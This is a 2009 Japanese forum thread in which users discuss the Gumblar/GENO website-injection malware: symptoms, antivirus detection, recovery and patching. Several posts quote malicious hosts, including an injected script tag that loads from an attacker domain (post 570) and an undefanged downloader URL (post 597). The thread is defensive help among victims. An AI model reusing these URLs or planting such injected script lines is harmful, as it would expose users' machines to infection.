ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。

534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:32:53 ]
Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト

自動でアップデートするものでは無いから大差ない

535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:53:50 ]
>>533
いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど
アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね

536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:54:31 ]
主導→手動でしたごめん

537 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:13:54 ]
Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない
アップデートは手動、Adobeのサイト言ってチェックしないといけない



538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:22:16 ]
過去の更新状況から考えると
更新があった場合はコンテンツが表示されたあとで
更新のダイアログが表示されていたはずだから
>>533の場合は既に攻撃を喰らったあとだろう


539 名前:533 mailto:sage [2009/10/27(火) 00:47:38 ]
レスくれたひとありがとう。

Flash_Reader_Updateは半自動化しかしてくれなくても、
インターネット前に必ずアップデートするとか、
>>387の記事のように、タスクスケジューラ使うようにすれば、
>>533みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。
ソフトDLすることにするわ。
記事みて検索してはじめて、タスクスケジューラを知った初心者だけどw

540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:50:55 ]
すまん感染の疑いのある者なんだがご教授願いたい
当方win機(一昨日買ったばかりwin7)とMac(OSX10.4)を使っている。
これらを使ってxoopsを使ったサイトを立ち上げようとした。
xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。
しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。
このエラーをググったらGENOウイルスの仕業らしい、と。

自分的には可能性として
1.win機が感染している
2.Mac機が感染、もしくは保菌者(?)になっている
3.レンタルサーバーの業者自体が感染している

なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態
Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態

現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。

541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:17:31 ]
>>540
前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、
そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、
上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか
確実にわかるんじゃないかな

今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、
むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った
ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが

542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:34:17 ]
>>541
ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。
Macのほうはメインマシンだから1日かかりそう><
とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる


543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:52:04 ]
Avast!がPDFの検出をするようになった
SWFは未確認

544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:02:39 ]
もうすぐnortonの期限が切れそうでどれにしようか迷っている
ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・
カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象

545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:05:35 ]
スレ違いっぽいが
GENOの話ならノートンは対応してるぞ

546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:10:38 ]
新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい
flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう

547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:13:07 ]
一口にGENO(新旧gamblar)と言っても、いくつものファイルが関係するから
ウイルス対策ソフトがどの段階で検知するかはマチマチ
全部スルーして、穴があるシステムはやられる



548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:14:39 ]
MSの脆弱だけじゃないからね。
Adobeの脆弱性はノートンはやってくれないし。

549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:16:51 ]
>>548
やってくれないとは?
間違いだと思うが

550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ]
嘘ばっかり言いやがるからな
2chだし適当に

551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ]
>>530
www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880

> Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
> G Dataが「JS:Downloader-EZ」で13件を検出した。

G DataのEZって…

552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:24:38 ]
>>546
ベストかもしれないが、現実的には_
うちの事務所は、みんなXPだし
とりあえず、うpだて最新にしとくことか…

553 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:32:28 ]
そういえばアドビやSunJavaのブラッドハウンドは見たことないね

554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:37:29 ]
>>546
個人なら切り替えはまだ容易だろうが
企業、特に中小企業だと業務用のPC全てを
XPから切り替えるのは容易ではない

555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:41:37 ]
このスレを覗きに来るような人たちには釈迦に説法だろうけど、
パッチ管理は多少面倒でももっとも効果的な対策
個人利用は無料のSecunia PSIで定期的なチェックをお勧め

Secunia Personal Software Inspector(PSI)ダウンロードページ
ttp://secunia.com/vulnerability_scanning/personal/
日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも

556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:06:16 ]
>>548-550
>>553

> 嘘ばっかり言いやがるからな
> 2chだし適当に

ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp
こちらを自分の目でご覧になりました?

557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:11:55 ]
>>556
何を言いたいんだ?
書いてあるねってことかな




558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 06:54:08 ]
今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は
カスペやAvastやノートン?でスキャンすれば検出や駆除が
きちんとできると思っていいのかな?
それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。
またすぐに違う亜種がでたらそれは別だろうけど。

559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 07:09:31 ]
>>539
タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。
新バージョンで「Quietモード」が追加されてる。
hide9999.web.fc2.com/

560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 16:58:43 ]
Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到
ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047


561 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:22:52 ]
感染したHDドライブをスキャン中。
ノートンひっかかってくれるかな。。。

562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:30:55 ]
未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。

563 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:37:47 ]
くるくるたああああああああああああああああいむ

564 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:51:34 ]
すでに10万ファイル調べてるのにひっかからん

くるくるたああああああああああああいむ

565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:59:10 ]
Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが
こういった一時的な利用なら
カスペルとAVASTの両方の検索エンジンを搭載した
G-DATAでスキャンしてみるのも良いかもしれない


566 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:01:59 ]
>>561
ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか?

567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:06:11 ]
今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね



568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 00:57:50 ]
だから良くなったんだろ

569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 04:46:17 ]
www●george-ohtsuka●com
これはGENOですか?別のウイルス?

570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 05:46:27 ]
>>569
流行のGENO踏み台型感染(Web改ざん)タイプ、サイト管理人のPCも感染してる

</head>と<body>の間にscriptを1行仕込まれている
script src=●●●●//psunrise●cn/images-d/index2●php



571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 06:31:28 ]
>>569
あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい
どうしてオランダ?

572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 07:27:02 ]
>>569
新型GENO(gumblar.x)と、iframeインジェクションの両方に改竄されてるね。

ちなみに>>525の報告のように、
gumblar一派とiframeインジェクション一派は抗争中らしいw
ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27
ttp://ilion.blog47.fc2.com/blog-entry-155.html

ショバ(botに引き込む無防備なPC)を取り合ってるのだろうか。

573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 14:40:46 ]
感染したHDD、定義済みノートンで検知せず。
カスペでスキャン中。
やっぱりリカバリしかないのかな。
どっちにしろレジストリいじらなきゃだめか。

574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 16:53:40 ]
>>573
リカバリしてもレジストリいじらなきゃだめなの?

575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 17:19:46 ]
リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。

576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 20:59:36 ]
>>573
どうして感染したと分かるの?

起動時に黒い画面?
黒い画面だと、どうやってPCを起動させて、スキャンしてるの?

577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:03:05 ]
IQが低いとそんな書き込みしかできない



578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:25:51 ]
PCが、いちだ〜い、にだ〜い、…
ヒュ〜、どろどろどろ…

579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:58:53 ]
>>575
ドライブがリカバリディスクを認識するものの
数時間まっても始まらないから、そこらへんもやられちゃってると思う。

調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。

一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。
スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。

とりあえず1症例として書いてみました。

580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:07:03 ]
それは別のもんに感染してるんじゃないの
あとCDもしくはDVDドライブからの起動にしてる?

581 名前:579 mailto:sage [2009/10/28(水) 23:36:31 ]
カスペのスキャン後に復活したみたいです。
ありがたいことにレジストリまで修正してくれるみたいだ。
駆除リストから詳細を調べたいが、
カスペがウィルスリストをぜんぜん登録してくれてない。。。

不具合としては、ユーザープロファイルが読み込めなる様子。
アカウント移行すれば問題ないです。

>>580
今回のでビンゴだったみたいです、
カスペの公式サイトのウイルス名と違ったもので。
ありがとうございます。

582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:41:55 ]
検出名隠蔽してたら誰もわからんわな

583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 08:53:46 ]
これはGENOウイルスでしょうか?

症状:
Vistaにて
起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
セーフモードだと起動。
regeditとcmdは起動。
sqlsodbc.chmも存在。ファイルサイズは通常通り。

どうでしょうか?

584 名前:名無しさん@お腹いっぱい。 [2009/10/29(木) 11:43:10 ]
1.感染したマシンからHDD抜く
2.HDDケースに入れる
3.感染していないPCにカスペたん入れる
4.感染しているHDDを外付けで3.のマシンに接続
5.スキャン

で駆除できるのかな?

人柱も嫌だし感染マシンが無いので検証してないけど

585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 15:34:50 ]
>>583
>起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
この症状はもろにそんなかんじだね

586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 18:05:01 ]
>>583
UAC切ってたのか?

587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 08:52:48 ]
>>583
いえ、ONにしてました。
悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。




588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 14:53:51 ]
利用してる脆弱性はAdobeだけじゃないんでなんとも
まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね

589 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:16:28 ]
構造的には現状ではUACはスルーできんはずだが?
特にvistaのUACは7のデフォルト設定より粘着質
勢いで許可したかupdateのフェイクにでも引っかかったか

590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:26:15 ]
>>583
カスペルのオンラインスキャナーではどうなりました?

591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:41:44 ]
>>583
それGENOじゃあないだろ
Daonolだと思うんだが?

592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:51:27 ]
Daonolはvistaは対象外で手口もGENOとそう変わらない

593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 02:12:59 ]
じゃあなんなんだ
別のウイルスかハードの寿命か

594 名前:名無しさん@お腹いっぱい。 [2009/10/31(土) 10:30:44 ]
パソコンのことはよく知らずにいたのが
わるかったんだけどなんかうちのサイト、感染したっぽい。

avast!が反応するようになっちゃった。
ファイル名 ttp://hd-select●com/blog/mail/mail_test.php
マルウェア名 JS:Redirector-H7 [Trj]

って出るんです。
ファイル名のサイト、バイクの通販かなんかだがこんなサイト
いったことないのになあ。

感染確認の類は全部やって異常は見られなかったけど
悲しいかな、サイトは削除しました。

595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 18:08:11 ]
典型的なGENOですね
バイクの通販サイトは・・・多分、あそこかなw

596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:08:38 ]
質問させてください
OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓
fancyrat●ru/cgi-bin/pomet2008●php

とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。

597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:15 ]
要求されたURLのWebページを表示できません
URL:
fancyrat.ru/cgi-bin/pomet2008.php
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x



598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:58 ]
aaa
miss
url変えてなかった。
開かんでおくれ。

599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:44:40 ]
>>594
関係ないサイトのコードが注入されるのが典型的なパターン
サイトは削除だけじゃなくそのサイト自体が無効にならないと
そのままのっとられる可能性があるので注意してください

感染確認というのが旧型Genoの確認方法だとしたら意味がないので
カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください

600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:45:56 ]
>>596
はい
新型のほうのGenoです
スキャンは他のメーカーのでもしてみてね

601 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 01:00:36 ]
レス下さった方ありがとうございます、新型なんですね……
バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。

602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 02:29:58 ]
最新の定義ならブロックしてくれてる可能性もあるが
まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう

603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:26:46 ]
firefox用のpdfプラグインは9.1.0.163が最新?
readerは9.2だけどこれでいいのかな

604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:40:56 ]
今更だけどなんでこうなったという感じだな
去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった
一体、Gumblarの作者は何を考えて作ったんだろうか
vistaだけど巡回しまくるから油断はできないな

605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:01:26 ]
>>597
情報収集をするためにこのスレをロムっていたが
ミスって踏んでしまった…

606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:20:11 ]
>>605
大丈夫?

607 名前:605 mailto:sage [2009/11/01(日) 19:42:24 ]
>>606
まとめの感染確認方法で調べてみましたが
一応、セーフでした、お騒がせして申し訳ありません。



608 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 20:19:53 ]
それは意味ないと何度言えば

609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 21:12:40 ]
vista/7ならおそらくセーフ
XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも
新型が未知のセキュリティホールを突いていたらの話だけど

610 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:11:53 ]
GENOに限った話ではないのですが、
ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に
的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか?

611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:44:39 ]
>>610
メールで教えるのは考え直した方がいいかと

612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 23:53:21 ]
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ

613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 16:11:17 ]
>>597
こういう判定ってどこでできるの?

614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 17:34:15 ]
aguseで確認すればいいだろ。

615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 19:55:16 ]
過信は禁物だけどな

616 名前:610 mailto:sage [2009/11/02(月) 20:48:14 ]
調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。

www.ipa.go.jp/security/todoke/
ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・

617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:52:12 ]
>>616
報告したならもうそれでいいだろ
>ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
ってわざわざうrl貼られても困るしここで聞くことじゃない



618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:53:53 ]
>>617
それは大変失礼しました。

619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 21:44:39 ]
>>616
どちらでも何らかの対処はされると思います
レンタルサーバ側に直接連絡してもたいていは対応してくれるはず
数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな

620 名前:名無しさん@お腹いっぱい。 [2009/11/02(月) 22:29:02 ]
ずいぶん情報集まってきたな
itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/

621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:09:53 ]
すみません、情報下さい。
クレクレなのは承知です

デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
復帰する時にgenoウイルスに感染した様です。
起動すると真っ黒な画面にマウスポインタがポツリ。
セーフモードでも同様。
とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。
しかし、エラー多発で起動せず。
前回は動作したのでメディアの問題ではないかと。

で、富士通のサポートHPによると回復できる様ですが、
その際データが消去されないか心配です。
その点については触れられていなかったので・・・
ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
この場合、データは消去されてしまいますか?

本当に困っています。
釣りではありません。
どうか教えて下さい。

622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:41:41 ]
>>621
> デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
> 復帰する時にgenoウイルスに感染した様です。
このとき感染したんじゃなくてその前から
感染してて復帰タイミングで発病したってだけでしょ

ubuntuの前回使用はいつなの?
メディアの問題じゃないってなんで断言できるの?

コマンドプロンプトからの復帰もしくはリカバリと
https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1

コマンドプロンプトの操作だけで復帰できればおそらく問題なし
リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう
マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません

> ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
これは何が言いたいのかわかりません。

> 本当に困っています。
だから何?
本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。

623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 01:16:49 ]
>>622
私の書き込みによって不快にさせてしまいましたか?
もしそうであれば申し訳ありません。

データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。
それでもダメでしたら、素直にメーカーに修理にだします。
ありがとうございました。

スレ汚しすみませんでした。

624 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 04:49:27 ]
管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに
そのサイトが感染してた期間中頻繁にアクセスしてたので、
今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、
黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、
むしろなぜ感染しなかったのか不思議です。

OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、
AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、
最新のひとつかふたつ前ぐらいのバージョンの状態でした。
Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、
それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか?
前回のGENOみたいに、感染したらファイルのサイズが変わるとか
確認できる方法があれば、まだ分かりやすいのにな。

625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:07:04 ]
>>624
最新のひとつかふたつ前だったからOKだったんだなきっと

626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:36:11 ]
>>625
やはりそう思われますか?
過信はもちろん禁物ですが、今回の新型に限っては
カスペルが感染してたら検出できるようですし
やっぱりギリギリセーフだったのかな?
ということは今回の新型は、最新のひとつかふたつ前より更に前の
脆弱性を狙ったものだったということになるのかもしれませんね。
もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。

627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 07:21:58 ]
いろんなサイトを巡回する人は特に注意
OSとAdobeのアップデート
XPでもFirefox+NoScriptでだいたいは防げる



628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 09:46:35 ]
お客様のPCが起動不能に
どうやらDaonolのようでした

629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:06:21 ]
>>624
挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない
被害サイトアクセスした時期によるかも

脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで
更新してなきゃくらってたはず

630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:07:24 ]
ついでにこれを機にSP3まであてて最新のパッチを当ててね

631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 21:28:47 ]
>>629
無効化されたあとではなかったみたい。
そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、
感染そのままの状態だったようで、その間何度も見にいってたから、
最新にはしてなかったから絶対に感染したと思ってました。

632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 22:47:25 ]
>>631
そのサイトがどこかわからんけど無効化されていたかどうか
実際に見てないならわからないよ
サイト管理者が確認したのは自分のサイトの改変だけじゃないの

実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト
自分のサイトは改変されてても挿入元がすでに消去もしくは
コード改変による無効化が行われていたとしたら閲覧したPCに被害は
ないかもしれないってだけだよ

633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:00:36 ]
>>632
なるほど!スクリプトなどを書かれてソースコード改変イコール確実に感染
かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、
挿入元がすでに消去とかされてる場合もあるのですね。
FTPにもかなり何度もアタックがありパスも書き換えられて
盗み見されたようでいたちごっこのようだったとも書かれていたので、
その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、
そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、
分かりやすく何度も教えて下さって本当にありがとうございます。
検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。
でもこれからはもっとupdateとか気をつけなければ。
本当にレスありがとうございました。何度もうざい連投すみません。

634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:27:03 ]
何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ
ブラウザが古いキャッシュでも見てたのかな

635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:29:26 ]
コード改変による無効化って、感染→スクリプト挿入などのコード改変
→更に自動的に無効化?
うーん?

今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
更に最終的に立ち上がらないようにまでしてしまうということなのかね
仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
そこで終わってセーフてことか

636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 01:35:36 ]
挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく
それを適当に無効化っていっちゃってるかんじですはい

なんつーかよくわからないまま混乱しちゃってるんじゃないかな
めんどいんで引用で

> 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
> そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
なんかちょっと違う気もするけどなんとなくはい

> スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
これはいいえ
脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く
攻撃が失敗か成功かってだけ

> 更に最終的に立ち上がらないようにまでしてしまうということなのかね
これは向こうのミスでそうなってしまったらしい
情報搾取が目的だから起動不能になるのは失敗なはず
ならないパターンもあるかもしれないしないかもしれない

> 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
> そこで終わってセーフてことか
まあはい
そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない

一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを
きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです

637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:40:54 ]
あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ
今はXPがたまたま脆弱性を突かれただけで
当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから
ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう
自覚を忘れないことが大切だと思うよ



638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:45:39 ]
それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか
反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか
丁寧にサンクス!

>>634
何度もその感染してた期間に閲覧してたみたいだから
古いキャッシュでも見てたというのはさすがにないんじゃないか?
それとも攻撃側がってことか?

639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:00:00 ]
だよなー
なんだろうなあ
カスペのスキャンが実は古かったとかないよね

640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:04:38 ]
今のところ突かれている脆弱性は既知のものだけなのは幸いだな。
攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。

641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:19:32 ]
偶然発見しちゃうときもあるから大丈夫ともいえないけどね

642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:33:03 ]
>>639
カスペは試用版ですが、データはもちろん最新にしてスキャンしました。
foxとノースクリプトを使っていたので大丈夫だったのかな?
とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。
やっぱり安心せずにリカバリするべきなのかな…。

643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:36:31 ]
今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には
gumblarで検知されて駆除されるんだよね
